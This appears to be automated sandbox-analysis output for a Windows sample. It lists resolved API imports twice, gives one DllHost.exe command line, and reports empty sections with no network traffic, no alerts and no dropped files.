api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthorityCount
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthority
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventRegister
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventUnregister
secur32.dll.GetUserNameExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCloseKey
shell32.dll.SHGetKnownFolderPath
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertSidToStringSidW
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueA
iertutil.dll.#701
iertutil.dll.#703
iertutil.dll.#702
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExA
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemAlloc
ws2_32.dll.#115
ws2_32.dll.#111
iertutil.dll.#791
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegSetValueExW
ws2_32.dll.#23
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
iphlpapi.dll.NotifyUnicastIpAddressChange
iphlpapi.dll.GetBestInterfaceEx
iphlpapi.dll.GetIfEntry2
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
kernel32.dll.HeapSetInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid
dwmapi.dll.DwmIsCompositionEnabled
ole32.dll.CoCreateInstance
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
ole32.dll.CoGetObjectContext
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
oleaut32.dll.#500
userenv.dll.CreateEnvironmentBlock
sechost.dll.ConvertSidToStringSidW
sspicli.dll.GetUserNameExW
userenv.dll.DestroyEnvironmentBlock
ole32.dll.CLSIDFromOle1Class
clbcatq.dll.GetCatalogObject
clbcatq.dll.GetCatalogObject2
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
wininet.dll.DllGetClassObject
wininet.dll.DllCanUnloadNow
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
api-ms-win-downlevel-ole32-l1-1-0.dll.CoImpersonateClient
api-ms-win-downlevel-ole32-l1-1-0.dll.CoRevertToSelf
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetTokenInformation
api-ms-win-downlevel-advapi32-l1-1-0.dll.CopySid
api-ms-win-downlevel-advapi32-l1-1-0.dll.EqualSid
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthorityCount
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthority
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventRegister
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventUnregister
secur32.dll.GetUserNameExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCloseKey
shell32.dll.SHGetKnownFolderPath
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertSidToStringSidW
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueA
iertutil.dll.#701
iertutil.dll.#703
iertutil.dll.#702
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExA
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemAlloc
ws2_32.dll.#115
ws2_32.dll.#111
iertutil.dll.#791
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegSetValueExW
ws2_32.dll.#23
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
iphlpapi.dll.NotifyUnicastIpAddressChange
iphlpapi.dll.GetBestInterfaceEx
iphlpapi.dll.GetIfEntry2
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
Sorry! No behavior.
Sorry! No tracee.
Sorry! No strace.
Sorry! No tracee.
No hosts contacted.
No TCP connections recorded.
No UDP connections recorded.
No domains contacted.
HTTP Requests
No HTTP(s) requests performed.
SMTP traffic
No SMTP traffic performed.
IRC traffic
No IRC requests performed.
No ICMP traffic performed.
CIF Results
No CIF Results
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Suricata HTTP
No Suricata HTTP
Sorry! No Suricata Extracted files.
Sorry! No dropped files.
Sorry! No process dumps.